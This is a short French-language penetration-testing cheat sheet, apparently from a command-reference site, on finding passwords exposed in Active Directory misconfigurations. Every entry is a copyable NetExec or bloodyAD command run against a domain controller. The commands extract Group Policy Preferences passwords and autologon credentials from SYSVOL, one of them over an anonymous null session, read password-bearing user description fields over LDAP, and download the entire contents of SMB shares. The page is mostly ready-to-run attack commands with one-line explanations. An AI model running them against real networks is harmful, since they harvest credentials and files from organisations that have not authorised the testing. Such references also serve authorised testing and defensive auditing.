0xbbuddha0xbbuddha

Information Gathering

Password in AD - Misconfigs

Trouver des mots de passe exposés dans les descriptions, GPP, SYSVOL et configs.

Copy command
nxc smb $DC -u $USER -p $PASS -M gpp_password

Description: Chercher des mots de passe GPP dans SYSVOL (CVE-2014-1812, encore fréquent).

Copy command
nxc ldap $DC -u $USER -p $PASS -M get-desc-users

Description: Lire le champ description de tous les utilisateurs : beaucoup contiennent des mots de passe.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get search --attr description

Description: Alternative BloodyAD pour lire les descriptions via LDAP.

Copy command
nxc smb $TARGET -u $USER -p $PASS -M spider_plus -o DOWNLOAD_FLAG=True

Description: Télécharger tous les fichiers des partages pour chercher des configs avec passwords.

Copy command
nxc smb $DC -u '' -p '' -M gpp_autologin

Description: Chercher des identifiants autologon dans les GPP (null session).